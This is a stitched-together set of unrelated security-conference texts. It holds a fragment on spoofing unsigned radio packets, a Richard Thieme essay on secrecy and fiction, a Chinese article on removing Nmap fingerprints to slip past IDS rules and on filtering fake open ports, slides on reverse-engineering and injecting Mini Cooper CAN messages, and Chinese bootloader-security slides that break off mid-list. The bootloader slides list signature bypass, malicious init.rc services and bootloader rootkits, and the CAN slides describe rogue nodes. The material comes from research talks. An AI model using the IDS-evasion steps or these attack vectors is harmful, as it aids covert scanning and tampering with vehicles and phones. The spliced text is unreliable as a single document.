Decoding Theory • Mix signal with PN sequence and the BPSK signal will drop out Packet Format Contd. • Wait a second… There is no signing… No encryption. • We can create packets if we known how to reproduce the checksum. • Reverse engineering the checksum Transmitting • Strictly Theoretical - Do not attempt • This is the easy part Impact of Transmission • Spoof communications • Disrupt critical services Signal Interception Demo • DEMO Future Research • Code optimization • Custom hardware • Widespread reception Slides and Code • Updated slides, resources, and code to be posted online after the presentation.
Writing Fiction to Tell the Truth By Richard Thieme Things are often not what they seem. That’s a “fact.” But that fact and others are filtered into our brains through images and words that often distort the truth—sometimes due to sloppy thinking but often as a result of policies adopted by “the national security state,” a complex state of affairs that carried over from World War 2 and has never stopped. The consequences of this shift are profound. A regimen of propaganda and censorship established during World War 2 made sense. The government did not want Americans to know that debris and bodies, for example, washed up along the Atlantic coast all the time due to U-boat activity. That secret and others were well kept with the cooperation of the media that served as portals into the “mind of society.” The Cold War, an enterprise that used propaganda and censorship as weapons, ensured that these policies would continue. Playing the great game of perception management on a global scale, information operations inevitably framed the thinking of Americans as well as enemies. Enemies and citizens, hearing the same narratives, became indistinguishable. Eisenhower, assisted by the Dulles brothers at the State Department and the CIA, was afforded plausible deniability of the use of covert operations (e.g. the overthrow of Iran’s Mossadegh and Argentina’s Arbenz) and established a pattern for subsequent secret operations. I asked a historian at NSA what historical events we could discuss with a reasonable expectation that our words meant the same details. “Anything up to 1945,” he said with a laugh – but he wasn’t kidding. The end of the Cold War did not end those policies.. New technologies enhanced the science of perception management. Cover stories weave truths, half-truths, and lies in a way that makes it impossible for average citizens to know what’s real. The attack on 9/11 was a catalyst to do even more, and today, social media serve as accelerators for spreading the arson fires of distorted truth. The extent of governmental secrecy, the number of documents now classified, and the number of people granted clearances because of a “need to know” have all expanded dramatically. The “need to know” as a requirement for access to compartmented truth means that many inside the intelligence community itself do not have all the dots to connect either. They too have to rely on what’s “out here” to guess at what’s real. Paradoxically, as a result, the only way to tell the truth is through fiction. Movies, television, and books present stories of practices that are sometimes true, sometimes not, but which create a shared narrative reinforced by repetition. As they percolate through the mind of society, manufactured narratives bind us, one to another, in fabrications that seem real, but serve other ends. One obvious example is the use of the television series “24” to hammer home the belief that when a bomb is ticking and will explode in 20 minutes, torture is appropriate. “24” has even been cited by policy makers as if it is factual, using fiction to support the real- life decision that torture is an appropriate instrument of covert war. The fact is, that “24” scenario is bogus. The “ticking bomb” story has never happened and is not likely to happen. The confluence of events required to create such a scenario don’t mesh in real life. But the real work – convincing Americans that torture is useful – was done. That example, writ large, suggests the nature of the world of distortion, illusion, and misdirection in which we swim. Hence, my talk for Def Con, the Las Vegas security conference where I will speak for the 19th year, is “Fiction is the Only Way to Tell the Truth.” Over a decade ago, a friend at the NSA told me not to discuss issues of "ethical considerations for intelligence" that we had explored unless I wrote fiction. "It's the only way you can tell the truth," he said. One result was "Mind Games," (Duncan Long Publishing: 2010), a collection of stories that illuminates “non-consensual realities” e.g. the worlds of hackers and intelligence professionals. In the first story, “Zero Day: Roswell,” a dying intelligence professional lists “things we do that you don’t know.” Because it was fiction – mind candy – the details, written in 2006, could float out there on the edge and be ignored or dismissed by the “authoritative voices” that govern what is real. An astute reader recently tweeted passages from that story juxtaposed with revelations from Edward Snowden, noting that they align. But Snowden stated them as facts and documented them with stolen data, so he has to live in Russia. A mere scribbler of fiction, I can stay here. When another friend, an intelligence analyst at NSA, read “Zero Day: Roswell” he called with a chuckle in his voice.”95% of this story isn’t fiction,” he said, “but you have to know which parts to have the key to the code.” Readers thought the bits about Roswell aliens were true, but they were fiction. They skipped over details about technology, which were often accurate. But without corroboration from an “authoritative voice,” such assertions were speculative and anomalous – which meant they never connected to the “real.” One inevitable negative consequence of living in this national security state is the proliferation of “niches of truthiness” in which internet-fed cattle eat everything dumped into the digital trough. A lack of critical thinking has led to the decline of political discourse. Investigative reporters shrink in number – there were 300+ in the newsroom of the Journal Sentinel once, but there are fewer than 100 today – while the blogosphere explodes, where anyone can say anything. Then followers retweet, repost, and “comment” from bunkers of invincible ignorance, sustaining distrust of official sources and basic common sense. The proliferation of angry, distrustful, well-organized “thought vigilantes,” exploited and mobilized by shout show hosts, with easy access to arms – I’d call that a negative consequence. Do we need a weatherman to know which way the wind is blowing? I am often asked after speeches if I believe we went to the moon or have rovers on Mars. Many people, because they don’t know what to believe, are willing to believe anything. United in fear –fear makes us predictable - they can then be collected in digital corrals and the entire corral can be moved, while those in it don’t even notice. In a speech at the NSA prior to Snowdengate, I warned of the chill created by wholesale intrusion and surveillance and a lack of concern for the effect on the mind of society. I warned of a lack of accountability to “we the people” who the agency was charged to proterct and defend. Once Snowden delivered his bombs, the dicussion of those issues went quickly to the top, where “ spin” strategies are devised in secret. Empires create the seeds of their demise through their own internal dynamics. An external event may serve as a catalyst but is never a full and sufficient cause. The good news is, that means we have some control over what we can choose to do. The bad news is, the historical record – as much as we can tell what it is – suggests that we won’t use that freedom. Richard Thieme (thiemeworks.com) is a Milwaukee-based author and professional speaker. He has spoken about security issues for the National Security Agency, the Secret Service, the Department of the Treasury, the FBI, and at the Pentagon and will speak for Def Con this summer for the 19th year.
nmap去除指纹以及识别假端⼝开放问题  0x00 前⾔  最近在研究⼯具链的组合使⽤,在⽹络端⼝扫描⽅⾯还是打算先集成⼀下nmap这种⽼牌的⼯具再 结合其他⼀些个性化⼯具来解决⼀些端⼝扫描上的需求。 这边先对nmap进⾏⼀些优化⽐如去除明显的指纹降低被识别的⻛险,其次解决⼀下因为防⽕墙策 略导致批量假端⼝开放的问题。 0x01 去除指纹的思路  nmap等各类开源扫描器⼀般来说都会有意⽆意的引⼊⼀些请求特征。⽐如tcp请求的⼀些选项配置 与正常请求不同,⽐如包含特定关键词的payload等。针对nmap我们可以先参考⼀下先知的这篇⽂ 章《如何修改nmap, 重新编译,bypass emergingthreats 的公开ids规则》,⾥⾯记录了⼀些 nmap的特征修改,作为⼀个开始是很不错的。那么我们该如何找到更多的指纹以便于去除呢? 根据先知这篇⽂章⼊⼿,我们可以把思路⼤概放在这⼏个地⽅: 1. 根据开源检测⼯具的规则集来找针对的特征并定位特征⽂件进⾏修改; 2. 在nmap等开源⼯具源码中直接全量搜索疑似的关键词⽐如Nmap; 3. 针对性的对某种请求进⾏wireshark抓包,并对这种请求与可能的正常请求进⾏⽐对看看有没 有明显的区别 ⼀般来说通过从1和2点开始⼊⼿是最好的。 从开源规则集⼊⼿  我这边先从开源IDS的snort以及suricata的规则集开始找寻相关的特征规则。 下载规则集 打开后可以看到有⼀⼤堆规则,具体语法⾃⼰可以参考官⽅的⽂档,其实你不懂语法,⼤概看看也 能理解个⼤概。但是当我搜索nmap关键词时并没有发现规则集⾥有针对nmap的特定规则,可能是 因为这是开源社区的规则,他并没有收录nmap的识别规则。 不过,仔细查找了⼀下资料,我在emergingthreats.net的⽹站⾥找到了nmap的规则集,看起来是 专⻔收录应急规则的⽹站。 我们在⽹站⾥搜索nmap可以看到收录了32条专⻔社区规则⽤于识别nmap。通过⽐对这些规则, 我们可以像开头先知⾥的⽂章那样定位到已知的特征点并进⾏更改。 ⽐如这样⼀条规则 alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET SCAN NMAP SQL Spider Scan"; flow:established,to_server; content:"GET"; http_method; content:" OR sqlspider"; http_uri; reference:url,nmap.org/nsedoc/scripts/sql-injection.html; classtype:web-application-attack; sid:2013778; rev:2; metadata:created_at 2011_10_19, updated_at 2020_04_20;) 由于规则⾥多个选项其实意味着“AND”的关系,因此我们只需要改变其中⼀个特征就⾏了。这⾥可 以看到会去匹配内容中包含“OR sqlspider”。 先搜⼀下这个是哪个⽂件⾥包含的sqlspider 进⼊ ./scripts/http-sql-injection.nse 替换sqlspider为任意字符串即可。 从明显字符串⼊⼿  通过⼀些规则我们可以看到,nmap等开源扫描器很喜欢⽤⾃⼰的名字做特征字符。⽐如我们搜⼀ 搜Nmap,然后把⼀些没有⽤的注释什么的过滤掉看看 find . -name "*.nse" -type f | xargs grep -s "Nmap" 像这样,我们在nse脚本⾥搜带有nmap关键词的内容 在⼀堆看起来都是没有⽤的东⻄⾥,⼀眼看到了疑似特征的内容 编辑脚本定位查看 确实是特征,在请求的ua⾥写⼊了Nmap字样,因此我们把它修改成普通的UA。 替换即可。 类似的,我们可以再找找,⽐如 ⼜看到个ssh探测的 ⼀看就是发送tcp包,把nmap字样去掉就⾏了。 ⼀般来说,只要在发送请求的函数或字段(⽐如send、useragent)⾥看到payload⾥包含特定关 键词的,这种通常就是特征,把它替换掉即可。 0x02 识别假端⼝开放问题  我们经常会遇到⼀些⽬标存在⼀些安全策略导致端⼝扫描呈现全部开放的情况,⽐如: Host is up (0.25s latency). Not shown: 139 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp filtered ssh 23/tcp open telnet 25/tcp open smtp 42/tcp open nameserver 80/tcp open http 81/tcp open hosts2-ns 110/tcp open pop3 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 143/tcp open imap 443/tcp open https 445/tcp filtered microsoft-ds 465/tcp open smtps 593/tcp filtered http-rpc-epmap 631/tcp open ipp 993/tcp open imaps 995/tcp open pop3s 1024/tcp open kdm 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1028/tcp open unknown 1029/tcp open ms-lsa 1030/tcp open iad1 1031/tcp open iad2 1032/tcp open iad3 1033/tcp open netinfo 1034/tcp open zincite-a 1035/tcp open multidropper 1036/tcp open nsstp 1037/tcp open ams 1038/tcp open mtqp 1039/tcp open sbl 1040/tcp open netsaint 1041/tcp open danf-ak2 1042/tcp open afrog 1043/tcp open boinc 1044/tcp open dcutility 1045/tcp open fpitp 1046/tcp open wfremotertm 1047/tcp open neod1 1048/tcp open neod2 1049/tcp open td-postman 1050/tcp open java-or-OTGfileshare 1051/tcp open optima-vnet 1052/tcp open ddt 1053/tcp open remote-as 1054/tcp open brvread 1055/tcp open ansyslmd 1056/tcp open vfo 1057/tcp open startron 1058/tcp open nim 1059/tcp open nimreg 1060/tcp open polestar 1061/tcp open kiosk 1062/tcp open veracity 1063/tcp open kyoceranetdev 1064/tcp open jstel 1065/tcp open syscomlan 1066/tcp open fpo-fns 1067/tcp open instl_boots 1068/tcp open instl_bootc 1069/tcp open cognex-insight 1070/tcp open gmrupdateserv 1071/tcp open bsquare-voip 1072/tcp open cardax 1073/tcp open bridgecontrol 1074/tcp open warmspotMgmt 1075/tcp open rdrmshc 1076/tcp open sns_credit 1077/tcp open imgames 1078/tcp open avocent-proxy 1079/tcp open asprovatalk 1080/tcp open socks 1081/tcp open pvuniwien 1082/tcp open amt-esd-prot 1083/tcp open ansoft-lm-1 1084/tcp open ansoft-lm-2 1085/tcp open webobjects 1086/tcp open cplscrambler-lg 1087/tcp open cplscrambler-in 1088/tcp open cplscrambler-al 1089/tcp open ff-annunc 1090/tcp open ff-fms 1091/tcp open ff-sm 1092/tcp open obrpd 1093/tcp open proofd 1094/tcp open rootd 1095/tcp open nicelink 1096/tcp open cnrprotocol 1097/tcp open sunclustermgr 1098/tcp open rmiactivation 1099/tcp open rmiregistry 1100/tcp open mctp 1102/tcp open adobeserver-1 1104/tcp open xrl 1105/tcp open ftranhc 1106/tcp open isoipsigport-1 1107/tcp open isoipsigport-2 1108/tcp open ratio-adp 1110/tcp open nfsd-status 1111/tcp open lmsocialserver 1112/tcp open msql 1113/tcp open ltp-deepspace 1114/tcp open mini-sql 1117/tcp open ardus-mtrns 1119/tcp open bnetgame 1121/tcp open rmpp 1122/tcp open availant-mgr 1123/tcp open murray 1124/tcp open hpvmmcontrol 1126/tcp open hpvmmdata 1130/tcp open casp 1131/tcp open caspssl 1132/tcp open kvm-via-ip 1137/tcp open trim 1138/tcp open encrypted_admin 1141/tcp open mxomss 1145/tcp open x9-icue 1147/tcp open capioverlan 1148/tcp open elfiq-repl 1149/tcp open bvtsonar 1151/tcp open unizensus 1152/tcp open winpoplanmess 1154/tcp open resacommunity 1163/tcp open sddp 1164/tcp open qsm-proxy 1165/tcp open qsm-gui 1166/tcp open qsm-remote 1169/tcp open tripwire 1174/tcp open fnet-remote-ui 1175/tcp open dossier 1183/tcp open llsurfup-http 1185/tcp open catchpole 1186/tcp open mysql-cluster 1187/tcp open alias 1192/tcp open caids-sensor 1198/tcp open cajo-discovery 1199/tcp open dmidi 1201/tcp open nucleus-sand 1213/tcp open mpc-lifenet 1216/tcp open etebac5 1217/tcp open hpss-ndapi 1218/tcp open aeroflight-ads 1233/tcp open univ-appserver 1234/tcp open hotline 1236/tcp open bvcontrol 1244/tcp open isbconference1 1247/tcp open visionpyramid ……………… 像这样⼀个⽬标nmap随便默认扫⼀下⼀排排的端⼝开放,⼀看就是有问题。很显然这是遇到了安 全策略导致的扫描结果误报。 ⼤致的原理⽬测是防⽕墙响应了syn请求和扫描器建⽴了完整的三次握⼿,因此不管是采⽤SYN扫 描还是TCP扫描,都会存在这种情况,⼏乎是难以进⾏判断到底开放了哪些端⼝以及具体是哪些服 务。那为了解决这个问题我们唯⼀的⽅法就是对所有的开放端⼝进⾏针对性的指纹扫描,⼤概流程 如下: 1. 端⼝扫描开放情况,如果存在⼤量的开放端⼝则判断为安全策略 2. 转到全端⼝或者是常⻅端⼝的指纹探测 3. 探测完指纹后对命中具体指纹的端⼝认为是开放的服务,没有响应可识别指纹的端⼝认为是假 端⼝ 为了快速实现,⼀般会采⽤下⾯两种实现⽅式: 1. 写脚本对全端⼝进⾏http和https请求,只探测响应http请求的服务 2. 进⼀步加强,采⽤tcp来发送http请求探针,记录有响应的服务情况,这种情况下会探测到http 的服务以外还有针对任意请求会响应的tcp服务 上⾯这两种⽅式通常是⼀般的⼈会采⽤的⼀种简略⽅式,但是这⾥⾯有显⽽易⻅的缺陷就是探针的 指纹库太普通,只能探测很肤浅的⼀部分服务,因为部分服务只针对特定的探针才会进⾏响应,⽽ 且因为缺少解析规则,我们也很难针对未知服务进⾏明确的标记即使他有响应内容。 利⽤nmap⾃带的探针  既然我⽤的nmap扫描,那么我是不是可以尝试利⽤nmap的扫描能⼒来进⾏识别呢?答案是肯定 的。很显然nmap⾃带的 -sV 的参数可以帮助我们使⽤其⾃带的探针来进⾏服务探测。nmap探针 ⽂档 事不宜迟我们找⼀个有策略的服务,利⽤命令 sudo nmap -sV --version-intensity 0 -oX nmapres2 xxxxxx 来输出⼀下探测结果。 结果⼤概⻓这个样⼦ 整个结果⼤概有800+,⼀眼丁真鉴定为假。 很显然这个结果是不满意的,他肯定包含有⼀⼤堆没有被探针正确识别的结果。我们⼤概理解⼀下 nmap的扫描逻辑: 1. 先进⾏端⼝开放扫描,由于策略原因⼤部分端⼝都标记为开放 2. 对开放的端⼝进⾏服务扫描,没有正确识别的服务nmap认为是探针不⾜没有识别到因此只是 没有服务信息,端⼝开放依旧保留 从nmap在终端⾥输出的结果我们也能⼤概猜到他的意思了 很显然部分端⼝服务没识别出来他⾃⼰也标注了未知和问号。⽽现在我需要的是⼀个包含明确开放 端⼝和服务情况的结果集,也就是说我要把这些不确定的东⻄都给去除掉,但⼜要保留下⾯nmap 不能识别的新特征的端⼝,因为新指纹特征的端⼝通常拥有响应说明其是有服务的 对nmap服务扫描的结果集进⾏过滤  由于nmap并没有提供类似的参数,因此我们必须⼿动对结果集进⾏过滤。要先过滤结果集我们先 看⼀下⽂档对nmap服务探测的描述。 简单来说nmap对于探针规则的配置和管理是在项⽬⽬录下nmap-service-probes这个⽂件⾥。⾥ ⾯的内容⼤致如下: 这个配置⽂件你暂时看不懂也没事,我们先来看看结果集⾥的细节是什么样⼦的,下⾯是抽取的结 果集⾥我认为是根本没有开放的端⼝的情况: <port protocol="tcp" portid="1026"><state state="open" reason="syn-ack" reason_ttl="43"/><service name="LSA-or-nterm" servicefp="SF-Port1026- TCP:V=7.91%I=3%D=10/20%Time=6351317C%P=x86_64-apple- darwin19.6.0%r(NULL,1,&quot;\n&quot;)%r(GetRequest,1,&quot;\n&quot;)%r(GenericLi nes,1,&quot;\n&quot;)%r(DNSVersionBindReqTCP,1,&quot;\n&quot;)%r(Help,1,&quot;\n &quot;)%r(SSLSessionReq,1,&quot;\n&quot;)%r(TLSSessionReq,1,&quot;\n&quot;);" method="table" conf="3"/></port> <port protocol="tcp" portid="1027"><state state="open" reason="syn-ack" reason_ttl="42"/><service name="IIS" servicefp="SF-Port1027- TCP:V=7.91%I=3%D=10/20%Time=6351317C%P=x86_64-apple- darwin19.6.0%r(NULL,1,&quot;\n&quot;)%r(SMBProgNeg,1,&quot;\n&quot;)%r(GenericLi nes,1,&quot;\n&quot;)%r(GetRequest,1,&quot;\n&quot;)%r(DNSVersionBindReqTCP,1,&q uot;\n&quot;)%r(Help,1,&quot;\n&quot;)%r(SSLSessionReq,1,&quot;\n&quot;)%r(TLSSe ssionReq,1,&quot;\n&quot;);" method="table" conf="3"/></port> <port protocol="tcp" portid="1028"><state state="open" reason="syn-ack" reason_ttl="43"/><service name="unknown" servicefp="SF-Port1028- TCP:V=7.91%I=3%D=10/20%Time=6351317C%P=x86_64-apple- darwin19.6.0%r(NULL,1,&quot;\n&quot;)%r(TerminalServer,1,&quot;\n&quot;)%r(Gener icLines,1,&quot;\n&quot;)%r(GetRequest,1,&quot;\n&quot;)%r(DNSVersionBindReqTCP, 1,&quot;\n&quot;)%r(Help,1,&quot;\n&quot;)%r(SSLSessionReq,1,&quot;\n&quot;)%r(T LSSessionReq,1,&quot;\n&quot;);" method="table" conf="3"/></port> 这⾥我们主要聚焦到service这个标签⾥的情况,⽐如 <service name="unknown" servicefp="SF-Port1028-TCP:V=7.91%I=3%D=10/20%Time=6351317C%P=x86_64-apple- darwin19.6.0%r(NULL,1,&quot;\n&quot;)%r(TerminalServer,1,&quot;\n&quot;)%r(GenericL ines,1,&quot;\n&quot;)%r(GetRequest,1,&quot;\n&quot;)%r(DNSVersionBindReqTCP,1,&quo t;\n&quot;)%r(Help,1,&quot;\n&quot;)%r(SSLSessionReq,1,&quot;\n&quot;)%r(TLSSession Req,1,&quot;\n&quot;);" method="table" conf="3"/> 这⾥经过我的分析有两个特征可以⽤来⼀定程度上排除⽆⽤信息 servicefp 仔细看 %r(TLSSessionReq,1,&quot;\n&quot;); 类似于这样的⼀⼩段,其实是在表达 TLSSessionReq这个探针获取 \n 这个结果。连续的⼏个探针说明尝试了这些探针然后都获取到了 \n ,因此我认为这是⼀种误报,我们可以根据这种特征把他们去除掉。 去除前: 去除后: 可以看到从800+变成了50+,确实去除了⼀些,但是还有部分端⼝我通过⼿⼯测试感觉也不靠 谱。 method="table" 我们先来看⼀个明确是正常开放有服务的端⼝ <port protocol="tcp" portid="25"><state state="open" reason="syn-ack" reason_ttl="41"/><service name="smtp" product="Exim smtpd" version="4.81" hostname="mailrelay.local" method="probed" conf="10"> <cpe>cpe:/a:exim:exim:4.81</cpe></service></port> 可以看到这⾥的method是probed。这 意味着这个端⼝的服务是根据探针来探测到的。那么table意味着什么呢?我猜测是经过probe后没 有探测到服务,因此nmap根据默认的端⼝和服务名称对应的表来给予⼀个参考结果,这个逻辑被 称为table。那么我们可以在这个场景下把这个table去除掉。 去除前: 去除后: 可以看到,效果很好,留下来的端⼝基本上都是我认为有理有据是真实存在服务的。 结合到扫描流程⾥  有了⼀个过滤逻辑后,我们现在把端⼝扫描流程进⾏优化。 1. oneforall中提取出ip地址给到nmap后进⾏端⼝扫描 2. 对nmap端⼝扫描的结果进⾏处理,如发现有ip存在连续端⼝则认为是存在安全策略 3. 判断有异常的ip单独进⾏sV扫描 4. 对sV扫描后的结果进⾏去噪⾳处理后得到准确的数据后完成流程 ⾄此,即使我们遇到了存在安全策略的⽬标也能通过⾃动化流程相对精准的获取到端⼝开放情况和 指纹特征⽽不需要去编写新的⼯具了。
Computer Science / www.isec.utulsa.edu How to Hack Your Mini Cooper: Reverse Engineering CAN Messages on Passenger Automobiles Jason Staggs Computer Science / www.isec.utulsa.edu Who is this guy? • Jason Staggs – Graduate Research Assistant • Institute for Information Security (iSec) • Crash Reconstruction Research Consortium (TU-CRRC) – TRUE Digital Security • Cyber Security Analyst Computer Science / www.isec.utulsa.edu Why do we hack cars? • Related work – “Comprehensive Experimental Analyses of Automotive Attack Surfaces” – “Experimental Security Analysis of a Modern Automobile” • Understanding computer and network systems on cars – Underlying CAN protocol and components lack of authentication and verification of messages • Understanding potential points of vulnerability – Vehicle network security is in its infancy • But most importantly… Computer Science / www.isec.utulsa.edu To prevent this.. Computer Science / www.isec.utulsa.edu From turning into this.. Computer Science / www.isec.utulsa.edu Because of this.. Computer Science / www.isec.utulsa.edu CAN Clock Project • Research project developed as a proof of concept – Manipulating CAN nodes via CAN network – Reverse Engineering CAN messages – 2003 Mini Cooper Computer Science / www.isec.utulsa.edu Background of vehicle communication networks • Began in 1980s with General Motors • Common vehicle Protocols – CAN (Most widely used among manufactures) – FlexRay – KW2000 – LIN – J1850 (GM/Chrysler) – J1939 (Heavy Trucks) – J1708/J1587 (Being phased out due to J1939) • 2008: All US cars use CAN for mandated EPA diag. Computer Science / www.isec.utulsa.edu Controller Area Networks • Bosh CAN standard – Developed in the 80s – European Manufactures were early adopters – Standard Format • 11-bit ID header • Mfg. use of proprietary IDs for each of their CAN components – Extended Format • 29-bit ID header • Used extensively by J1939 Computer Science / www.isec.utulsa.edu CAN Frame – SOF – Start of Frame – Identifier – Unique identifier for message along with priority – RTR – Remote Transmission Request – IDE – Identifier extension (distinguishes between CAN standard and CAN extended) – DLC – Data Length Code (frames have up to 8 bytes of data) – CRC – Cyclic Redundant Check sum – ACK – Acknowledge – EOF – End of Frame – IFS – Intermission Frame Space Computer Science / www.isec.utulsa.edu Interconnected vehicle networks Computer Science / www.isec.utulsa.edu Electronic Control Units (ECUs) • ECUs designed to control : – Vehicle safety systems • Engine control unit • ABS braking system • Door locks – Infotainment systems • Radio Deck • HID units – The list goes on • Programmable ECUs – Allows MFGs to update firmware on ECUs • Average modern day car has ~70 ECUs Computer Science / www.isec.utulsa.edu Reverse Engineering CAN Messages • What we want to do: – Manipulate CAN enabled vehicle components • Problem: – Manufactures do not publish CAN message ID information about their various CAN components • Solution: – A method for visually correlating physical system interactions with identifiable patterns. (Humans are good at this) – Brute force (Tedious, and messy) Computer Science / www.isec.utulsa.edu Reverse Engineering CAN Messages • Passively captured CAN data during a staged test run – In this case it was a staged automotive collision..  – Mini Cooper vs. GMC Envoy (Check out TU-CRRC website for killer videos) – Data capture lasted for roughly 90 seconds • Data Log gives us ~106,000 data entries of CAN messages Computer Science / www.isec.utulsa.edu Computer Science / www.isec.utulsa.edu CAN Data Log • Contained ~106,000 data entries • Bash “cut –d. –f3 cooperheadion.txt | sort | uniq –c” – Only 15 Unique CAN IDs!? ID Occurrences CAN IDs 12706 153 12706 1F0 12706 1F3 9460 1F5 12707 1F8 8899 316 8899 329 Computer Science / www.isec.utulsa.edu Visually identifying CAN messages of interest 0 5 10 15 20 25 30 0 10 20 30 40 50 60 70 80 90 100 Vehicle Speed (MPH) Time (sec) 0x153 Byte 2 CAN Message Computer Science / www.isec.utulsa.edu Reverse Engineering CAN Messages • Speedometer and Tachometer CAN IDs – 2 methods • For each CAN ID, plot data values vs. timestamp in order to determine physical significance. • Given possible CAN IDs, fuzz data fields until needles start moving CAN Message ID Description 0x153 Byte 2 Speedometer (Vehicle Speed) 0x316 Byte 3 Tachometer (Engine Speed) 0x329 Various indicator lights 0x61A Controls the messages being displayed on the tachometer LED screen. 0x61F Tachometer along with various indicator lights Computer Science / www.isec.utulsa.edu Building the CAN network • CAN Bus – 18 gauge wire – 2 x 120 ohms terminating resistors – 12V DC power source – Arduino Uno microcontroller – CAN Bus Shield • MCP2515 CAN controller • MCP2551 CAN transceiver – Mini Cooper Instrument Cluster – Real time clock module RTC (for clock mode) Computer Science / www.isec.utulsa.edu Computer Science / www.isec.utulsa.edu Computer Science / www.isec.utulsa.edu Proof of Concept • Talking CAN with Arduino – Arduino and CAN Controller Libraries • MCP2515 (Communication with CAN transceiver) • SPI (Used for communications between Arduino and CAN shield) • 2 Modes of operation – Clock Mode – Demo Mode Computer Science / www.isec.utulsa.edu Demo Computer Science / www.isec.utulsa.edu Gaining physical access to CAN • Via OBD2 • Tapping the CAN bus (vampire tap) – Under the hood – Breaking a powered side view mirror – Etc. • 0 to pwned for less then $100 – Rogue Arduino CAN node • Potential conspirators – Mechanics – Car Rentals – Coworkers/Family/Friends/Ex-girlfriends/etc. Computer Science / www.isec.utulsa.edu Future Work / Conclusion • Access control between vehicle network components – ECU to ECU – OBD2 to ECU • Applying conventional NIPS & firewall methods to CAN – Message anomaly prevention depending on context? Computer Science / www.isec.utulsa.edu For more Information • TU Research – http://isec.utulsa.edu/ – http://tucrrc.utulsa.edu/ ← Check out our research and crash tests  – http://tucrrc.utulsa.edu/canclock/ • CAN Standards/Docs – http://esd.cs.ucr.edu/webres/can20.pdf (CAN 2.0 Spec) – http://www.sae.org/standards/ Computer Science / www.isec.utulsa.edu Questions?? • jason-staggs@utulsa.edu
解析bootloader安全 程君 throber3@gmail.com 自我介绍 • 10年安全研究与开发 • 系统安全,移动与嵌入式安全 • 2008-2010 comodo 主动防御研究与开发 • 2010- 2011 网秦移动安全高级研究员 • 2011- 至今 猎豹移动研发经理,参与手机 毒霸研发 移动安全支付 • 社会工程 短信诈骗 电话诈骗 • 盗号 程序伪冒 钓鱼 键盘记录 网络截获 • 系统漏洞 Root 提权 内存读取 • bootloader级别漏洞 议程 • bootloader 基本介绍 • bootloader 获取与分析 • bootloader 具体流程 • bootloader attack vector 以及漏洞介绍 • bootloader 安全总结 bootloader 基本介绍 • 什么是bootloader Bootloader 是启动加载的意思。在pc时代,windows 系统开 机时会首先加载bios,然后是MBR,再到os loader系统内核,最后启动 完毕。bootloader就相当于MBR 和os loader,它在手机启动的时候初 始化硬件,然后引导系统内核,直到系统启动。常见的有pc 的grub 和嵌入式的uboot。 bootloader 基本介绍 • 研究bootloader 的意义 1.修复变砖机器 2.寻找漏洞:越狱(iphone)与解锁 (android) iphone: bootrom 漏洞 key 提取 android:1.永久root 2.安装第三方rom 3.安全移动操作系统设计:knox bootloader 基本介绍 • 研究对象 由于bootloader 涉及到芯片厂商和系统,不同厂商和不同系 统的启动流程均不相同,高通芯片和android市场占有率最高,本议 题如果没有指明特定的芯片和平台,均以android 下的高通平台作为 例子说明。iphone只简要介绍其bootloader流程 bootloader 基本介绍 • bootloader 组成 (android) 1.PBL:prime bootlader,iphone 叫 bootrom 2.SBL(1/2/3):secord bootloader 3.APPSBL:HTC 的叫hboot,有的叫aboot 4.HLOS: 基带也叫basehand或者radio 5.TZ:TrustZone bootloader 基本介绍 • bootloader 组成 (iphone ) 1.BootRom: PBL, SecureROM 2.LLB:Low Level Bootloader, checks the signature of iBoot 3 iBoot:stage 2 bootloader ,recovery mode 4.iBBS:A stripped down version of iBoot 5.iBEC:performing a restore from Fake DFU in LLB. bootloader获取与分析 • Bootloader 获取 1.从rom 中获取 android后缀为mbn或者img 2. 从系统中dump a.有些android 手机 可以dump bootloader的挂载文件 bootloader获取与分析 • bootloader 获取 例如:华为P1 dd if=/dev/block/mmcblk0p3 of=/sdcard/mnt/bootloader.img b.iphone 下 Limera1n Exploit dump Bootrom 3. 硬件使用jtag 接口获取 android 手机一般可以通过jtag 接口获取 bootloader获取与分析 • bootloader 分析(以android sbl1为例) 直接把sbl1 拖到ida 中反汇编效果不明显, 我们缺少了什么?加载地址。怎么样确定加 载地址? 1.bootloader cpu体系手册规定的加载地 址 2.bootloader 文件格式结构 3.手动分析,经验猜测 bootloader获取与分析 • bootloader 分析 (以android sbl1为例) 1.bootloader cpu体系手册规定加载地址 现在手机操作系统一般使用高通的芯片 比较多,我们以MSM8960为例 见下图 : sbl1 0x2A000000 tz: 0x2a020000 sbL2 0x2E000000 sbl3:0x47f00000 bootloader获取与分析 • 加载地址 来自《8960 Boot Architecture》 bootloader获取与分析 • bootloader 获得与分析 (以android 为例) 2.bootloader 文件结构中规定的加载地址 bootloader获取与分析 • bootloader 分析 (以android sbl1为例) 3.手动分析,经验猜测 我们知道这些未知格式的rom要运行的话, 必须有加载地址,可能有简单的头格式,如第二 种方法种见到的头格式,如果有的话,这个头格 式可能包含加载地址(pe,elf格式文件头都有这 种加载地址叫entrypoint)。在程序代码引用中如 果出现大量的未知地址,如果这些地址很相近, 那么可能是我们要找的加载地址。 bootloader 基本介绍 • bootloader 分析 (以android sbl1为例) 从上面可以看出,0xF803D5A5 没有解析出来, 这个地址附近相关地址在系统中出现,可能是我 们的加载地址,由于对其原因,我们可以猜测出 加载地址为:0xF8000000 bootloader 具体流程 • boot 一般流程 第一阶段: 1.初始化基本硬件; 2.把bootloader自动搬运到内存中; 3.设置堆栈指针并将bss段清零,为后续执行代码做准备; 第二阶段: 1.初始化本阶段要用到的硬件; 2.读取环境变量; 3.启动: (a)自启动模式,从Flash或通过网络加载内核并执行; (b)下载模式,接收到用户的命令后执行; bootloader 具体流程 • bootloader 具体流程 (android ) PBL(bootrom)-sbl1-> sbl2-> tz->sbl3-> APPSBL(app bootloader) bootloader 具体流程 • bootloader 具体流程 (iphone ) 1.iphone normal mode 2.iphone DFU mode (Device Firmware Upgrade) bootloader 具体流程 • bootloader 具体流程总结 一般bootloader 分为多阶段引导,除了 进行正常的硬件初始化,还有一个重要的任 务就是签名验证,上一层对下一层进行安全 签名验证,以保证下一层系统的完整性,最 终加载os 系统内核。 bootloader attack vector • fastboot 是bootloader 的交互接口 fastboot oem unlock(厂商留着解锁的) fastboot boot 危险接口 bootloader attack vector • 对于未解锁的 通过fastboot 接口,bypass 验证签名达到 改写系统目录权限 • 对于解锁的 1.修改加载的boot.img 系统文件 init.rc 文件加 载自己的恶意服务 2.在bootloader 中嵌入rootkit 代码 bootloader attack vector • 